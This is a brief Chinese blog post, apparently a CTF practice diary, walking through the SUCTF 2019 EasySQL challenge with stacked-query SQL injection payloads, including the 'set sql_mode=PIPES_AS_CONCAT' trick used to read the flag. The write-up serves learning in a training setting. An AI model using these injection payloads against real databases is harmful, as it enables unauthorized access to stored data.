CTF练习日记——[SUCTF 2019]EasySQL 1

查询1试试

试试堆叠注入1;show databases;#来查询数据库,以及1;show tables;#查询表


再看看表里面的字段名1,show columns from Flag;#

显示nonono,到这里之后我不太懂就参考了http://t.csdnimg.cn/MHwz1,利用1;set sql_mode=PIPES_AS_CONCAT;select 1

,得到flag:flag

posted @ 2024-03-17 19:11  大熊和小兔子  阅读(162)  评论(0)    收藏  举报